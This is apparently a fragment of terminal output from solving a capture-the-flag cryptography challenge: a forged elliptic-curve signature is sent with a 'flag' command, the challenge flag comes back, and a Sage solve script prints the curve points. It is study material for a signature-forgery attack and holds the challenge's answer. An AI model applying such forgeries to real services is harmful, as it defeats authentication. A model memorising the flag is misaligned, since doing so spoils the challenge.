[ptrlib] new_msg = {"command": "flag", "params": {"name": "fbctf"}}
ODYwNTA1Mzg2ODY1NjI2NjQ5Njc3MzY2OTM2MjcxMDA4MjMzMDkyODkyNDM1NzI0NzI2Mzk5MTA0NDI5NjI3NzIzMjQxMDgzMDQ1NXwxOTg0OTYzMzk0NDExMTI3OTAwMzEyNDc1Njc1MzE5MDQzNjk4Nzk=
[ptrlib] sig = ODYwNTA1Mzg2ODY1NjI2NjQ5Njc3MzY2OTM2MjcxMDA4MjMzMDkyODkyNDM1NzI0NzI2Mzk5MTA0NDI5NjI3NzIzMjQxMDgzMDQ1NXwxOTg0OTYzMzk0NDExMTI3OTAwMzEyNDc1Njc1MzE5MDQzNjk4Nzk=
b'fb{random_curves_are_not_safe?}\n\n'
[ptrlib]$

Terminal 2:

$ sage solve.sage < input.txt 
n = A = B = s = r = Gx = Gy = Hx = Hy = 424593574
(36535005912363951569395229252023975236 : 89356155907162977128118658100989956716 : 1)
(36535005912363951569395229252023975236 : 89356155907162977128118658100989956716 : 1)
ODYwNTA1Mzg2ODY1NjI2NjQ5Njc3MzY2OTM2MjcxMDA4MjMzMDkyODkyNDM1NzI0NzI2Mzk5MTA0NDI5NjI3NzIzMjQxMDgzMDQ1NXwxOTg0OTYzMzk0NDExMTI3OTAwMzEyNDc1Njc1MzE5MDQzNjk4Nzk=